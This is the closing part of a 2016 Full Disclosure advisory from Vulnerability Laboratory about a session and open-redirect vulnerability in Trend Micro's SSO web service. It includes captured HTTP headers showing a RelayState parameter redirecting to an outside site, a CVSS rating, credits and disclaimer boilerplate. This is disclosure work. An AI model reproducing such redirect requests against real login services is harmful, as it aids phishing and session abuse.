Accept-Encoding[gzip, deflate, br]
Referer[https://sso1.trendmicro.com/signin/module.php/myaccount/loginuserpass.php?AuthState=_d78a8d5cb1b42574c7b94deeb9d15199caf5781311%3Ahttps%3A%2F%2Fsso1.trendmicro.com%2Fsignin%2Ftmsaml%2Fidp%2FSSOService.php%3Fspentityid%3Dmyaccount-sp%26cookieTime%3D1454068202%26RelayState%3Dhttps%253A%252F%252Fyahoo.com%252Fmy_account%252F]
Cookie[B=]
Connection[keep-alive]
Response Headers:
Date[Fri, 29 Jan 2016 11:52:31 GMT]
Via[https/1.1 ir6.fp.ne1.yahoo.com (ApacheTrafficServer)]
Server[ATS]
Location[https://www.yahoo.com/my_account/]
Content-Type[text/html]
Content-Language[en]
Cache-Control[no-store, no-cache]
y-trace[BAEAQAAAAAAmoBYDWfT3qwAAAAAAAAAAbpfxk8XLzrgAAAAAAAAAAAAFKnerkc.NAAUqd6uR22UgXJ6WAAAAAA--]
Content-Length[382]
X-Firefox-Spdy[h2]
Security Risk:
==============
The security risk of the session web and redirect vulnerability in the
trend micro sso online service web-application is estimated as high.
(CVSS 6.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] – Hadji Samir [Evolution
Security GmbH]
[http://www.vulnerability-lab.com/show.php?user=Hadji%20Samir]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability
for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if
Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages.
Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not
apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with
fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@...nerability-lab.com -
research@...nerability-lab.com - admin@...lution-sec.com
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab -
facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are
reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or
managers. To record, list (feed), modify, use or edit our material contact
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a
permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists